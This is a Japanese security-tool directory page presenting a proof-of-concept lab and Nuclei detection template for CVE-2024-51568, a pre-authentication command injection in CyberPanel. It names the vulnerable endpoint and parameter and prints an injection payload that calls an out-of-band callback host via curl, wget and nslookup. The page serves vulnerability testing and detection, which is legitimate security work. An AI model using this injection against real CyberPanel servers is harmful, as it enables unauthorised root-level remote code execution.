Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template — CVE-2024-51568(CyberPanelにおける認証前のコマンドインジェクションの脆弱性で、ルート権限でのリモートコード実行を可能にする)をテストするための概念実証環境とNucleiテンプレート。 | Kitploit
ツール/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育ラボと実践
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

CVE-2024-51568(CyberPanelにおける認証前のコマンドインジェクションの脆弱性で、ルート権限でのリモートコード実行を可能にする)をテストするための概念実証環境とNucleiテンプレート。

リポジトリを見る
1131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-51568 - CyberPanel コマンドインジェクション PoC

CVE-2024-51568(CyberPanel における重大な認証前コマンドインジェクション脆弱性)をテストするための概念実証環境および Nuclei テンプレート。

脆弱性の詳細

  • CVE: CVE-2024-51568
  • 重大度: 重大 (CVSS 9.8)
  • タイプ: 認証前コマンドインジェクション
  • エンドポイント: /filemanager/upload
  • パラメータ: completePath
  • 影響: root 権限でのリモートコード実行

クイックスタート

1. 脆弱性環境の起動

root@kitploit:~
cd docker/
docker-compose up -d --build

2. CyberPanel が起動していることを確認

root@kitploit:~
curl -I http://localhost:8090

3. 脆弱性のテスト

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

Sample Output:

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

仕組み

脆弱性

CyberPanel v2.3.4 には、ファイルアップロード機能にコマンドインジェクションの欠陥があります。

  1. エンドポイント: POST /filemanager/upload
  2. パラメータ: マルチパートフォームデータ内の completePath
  3. インジェクション: ProcessUtilities.outputExecutioner() 経由でコマンドが実行される
  4. バイパス: ミドルウェアバイパスにより認証不要

Nuclei テンプレート:

  1. 初期 GET リクエストから CSRF トークンを抽出する
  2. completePath にインジェクションされたコマンドを含む悪意のあるファイルアップロードを送信する
  3. アウトオブバンド検出(HTTP/DNS コールバック)に Interactsh を使用する
  4. サーバーが Interactsh URL に接続したときに、実行成功を検出する

検出ペイロード

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

このペイロードは、異なるシステム構成でも信頼性の高い検出を保証します。

設定

CyberPanel アクセス

  • URL: http://localhost:8090
  • 管理者: admin
  • パスワード: 1234567

参考文献

  • 元の研究
  • Metasploit モジュール
  • CVE 詳細

セキュリティに関する注意事項

この環境には、セキュリティ研究および教育を目的とした意図的な脆弱性が含まれています。

  • 本番環境にデプロイしないでください
  • 公開ネットワークに公開しないでください
  • 自分が所有していないシステムで使用しないでください
  • 許可されたセキュリティテストのみに使用してください

免責事項

この概念実証は、教育および許可されたセキュリティテストの目的のみで提供されます。ユーザーは、該当する法律を遵守し、テスト前に適切な許可を得る責任があります。

ツールをダウンロード